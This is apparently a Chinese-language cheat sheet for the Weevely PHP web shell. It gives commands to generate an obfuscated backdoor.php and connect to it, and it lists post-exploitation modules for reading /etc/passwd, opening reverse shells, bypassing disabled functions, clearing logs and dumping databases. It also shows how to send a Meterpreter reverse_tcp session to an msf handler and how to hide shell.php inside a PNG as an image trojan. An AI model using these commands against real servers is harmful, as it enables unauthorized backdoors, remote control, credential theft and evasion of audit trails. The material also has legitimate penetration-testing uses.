生成shell

weevely generate 密码 路径 文件名
plaintext
weevely generate cmd ./backdoor.php(weevely --man中有命令)

weevely generate -obfuscator cleartext1_php cmd ./backdoor.php (用模板生成混淆的shell,weevely -generate --help中有命令)

连接shell

weevely url 密码
plaintext
weevely http://127.0.0.1/backdoor.php cmd

各项模块

键入:help查看更多帮助信息

weevely>:help
plaintext
信息搜集:
 :shell_su                     通过更变使用者来执行shell命令,可以获得root权限来执行命令.                                         
 :shell_sh                     执行 shell 命令,例如:shell_php system('dir');                                             
 :shell_php                    执行 PHP 命令.                                                
 :system_extensions            收集PHP和webserver扩展列表                           
 :system_info                  收集系统信息                                          
 :system_procs                 列出正在运行的进程                                              
 :audit_disablefunctionbypass  使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell     
 :audit_etcpasswd              查看/etc/passwd文件                           
 :audit_suidsgid               查找带有SUID或SGID标志的文件。                                  
 :audit_phpconf                查看php配置信息                                             
 :audit_filesystem             审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等                         
 :backdoor_reversetcp          执行反向TCP shell. 需要nc -lvp <port>监听                                        
 :backdoor_tcp                 在TCP端口上生成shell                                         
 :net_scan                     TCP端口扫描.                                                       
 :net_mail                     发送邮件.                                                           
 :net_ifconfig                 获取网络接口地址.                                    
 :net_curl                     执行类似curl的HTTP请求.                                    
 :net_proxy                    运行本地代理以通过目标转移HTTP / HTTPS浏览 
 :net_phpproxy                 在目标上安装PHP代理.                                     
 :bruteforce_sql               可用来猜解数据库密码.                                             
 :file_find                    查找具有给定名称和属性的文件.                          
 :file_download                从远程文件系统下载文件.                                
 :file_check                   获取文件的属性和权限.                            
 :file_touch                   更改文件时间戳.                                               
 :file_cd                      更改当前工作目录.                                    
 :file_grep                    打印与多个文件中的模式匹配的行.                    
 :file_gzip                    压缩或解压gzip文件.                                       
 :file_tar                     压缩或解压tar文件.                                     
 :file_enum                    检查路径列表的存在和权限
 :file_bzip2                   压缩或解压bzip2文件.                                      
 :file_mount                   使用HTTPfs挂载远程文件系统.                                
 :file_clearlog                从文件中删除字符串.                                           
 :file_zip                     压缩或解压zip文件.                                        
 :file_cp                      复制单个文件.                                                    
 :file_upload2web              自动将文件上传到Web文件夹并获取相应的URL. 
 :file_edit                    在本地编辑器上编辑远程文件.                                  
 :file_read                    从远程文件系统中读取远程文件.                         
 :file_webdownload             指定URL下载文件.                                                     
 :file_upload                  文件上载到远程文件系统.                                    
 :file_ls                      列出目录内容.                                              
 :file_rm                      删除远程文件.                                                  
 :sql_dump                     Multi dbms mysqldump replacement.                                    
 :sql_console                  执行SQL查询或运行sql控制台.

反向shell连接MSF

在这使用:backdoor_meterpreter参数
:backdoor_meterpreter 反向shell
-payload php/meterpreter/reverse_tcp 是搭载的攻击载荷
-lhost 转发给监听的ip地址
-lport 监听端口
plaintext
weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 127.0.0.1 -port 4444
转发完成,接下来就是打开msf使用监听模块监听,获取控制权
plaintext
msf6 >use exploit/multi/handler #使用监听模块
show options
set payload php/meterpreter/reverse_tcp #使用与上面相同的payload
set Lhost 127.0.0.1
set Lport 4444
run

合成图片木马

plaintext
cat image.png shell.php > shell.png